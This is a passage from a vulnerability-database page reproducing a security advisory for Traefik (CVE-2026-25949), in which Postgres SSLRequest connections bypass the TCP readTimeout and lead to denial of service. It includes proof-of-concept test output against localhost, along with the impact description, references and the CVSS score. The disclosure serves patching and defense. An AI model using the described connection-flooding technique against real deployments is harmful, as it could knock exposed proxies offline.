expand)\u003c/summary\u003e\n\n```bash\nVersion:      3.6.7\nCodename:     ramequin\nGo version:   go1.24.11\nBuilt:        2026-01-14T14:04:03Z\nOS/Arch:      linux/amd64\nTraefik=/usr/local/sbin/traefik\nHost=127.0.0.1 Port=18080 ReadTimeout=2.0s N=300 Sleep=3.5s\ntraefik_pid=46204 fd_base=6\nbaseline_opened=300 fd_after_open=128 delta=122\nbaseline_after_sleep fd=6 delta_from_base=0\ncandidate_opened=300 fd_after_open=306 delta=300\ncandidate_after_sleep fd=306 delta_from_base=300\nVULNERABLE: Postgres SSLRequest keeps connections open past entrypoint readTimeout.\n```\n\u003c/details\u003e\n\n### Impact\nDenial of service. Any internet-exposed entrypoint using the TCP switcher/protocol detection (including \"web\" HTTP entrypoints) with a `readTimeout` is affected; no Postgres configuration is required. At sufficient concurrency, Traefik can hit process limits (FD exhaustion/goroutine pressure/memory), taking the proxy offline.\n\n\u003c/details\u003e",
  "id": "GHSA-89p3-4642-cr2w",
  "modified": "2026-02-12T22:08:02Z",
  "published": "2026-02-12T15:54:11Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/security/advisories/GHSA-89p3-4642-cr2w"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25949"
    },
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/commit/31e566e9f1d7888ccb6fbc18bfed427203c35678"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/traefik/traefik"
    },
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/releases/tag/v3.6.8"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Traefik: TCP readTimeout bypass via STARTTLS on Postgres"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-25949 (GCVE-0-2026-25949)

FKIE_CVE-2026-25949

CERTFR-2026-AVI-0154

Solutions

GHSA-89P3-4642-CR2W

Impact

Patches

For more information

Tags

Sightings

Nomenclature